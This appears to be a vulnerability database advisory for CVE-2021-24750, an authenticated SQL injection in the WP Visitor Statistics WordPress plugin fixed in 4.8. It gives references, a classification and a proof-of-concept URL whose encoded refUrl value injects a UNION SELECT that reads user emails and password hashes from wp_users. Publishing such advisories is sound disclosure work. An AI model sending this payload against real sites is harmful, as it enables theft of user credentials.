WordPress Plugin Vulnerabilities

WP Visitor Statistics (Real Time Traffic) < 4.8 - Subscriber+ SQL Injection

Description

The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22%27%20union%20select%201,1,user_email,user_pass%20from%20wp_users%20--%20g%22%7D

Affects Plugins

Plugin icon
wp-stats-manager
Fixed in 4.8

References

CVE
CVE-2021-24750
Exploitdb
50619
URL
https://plugins.trac.wordpress.org/changeset/2622268

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
7528aded-b8c9-4833-89d6-9cd7df3620de

Timeline

Publicly Published
2021-11-22 (about 2 years ago)
Added
2021-11-22 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2014-08-01
Title
Dynamic Font Replacement 1.3 - SQL Injection
Published
2022-12-09
Title
LetsRecover < 1.2.0 - Admin+ SQLi
Published
2024-04-30
Title
Barcode Scanner with Inventory & Order Manager < 1.5.5 - Authenticated (Subscriber+) SQL Injection
Published
2015-10-12
Title
Pie-Register <= 2.0.18 - Authenticated Blind SQL Injection
Published
2015-06-02
Title
LeagueManager <= 3.9.11 - Unauthenticated SQL Injection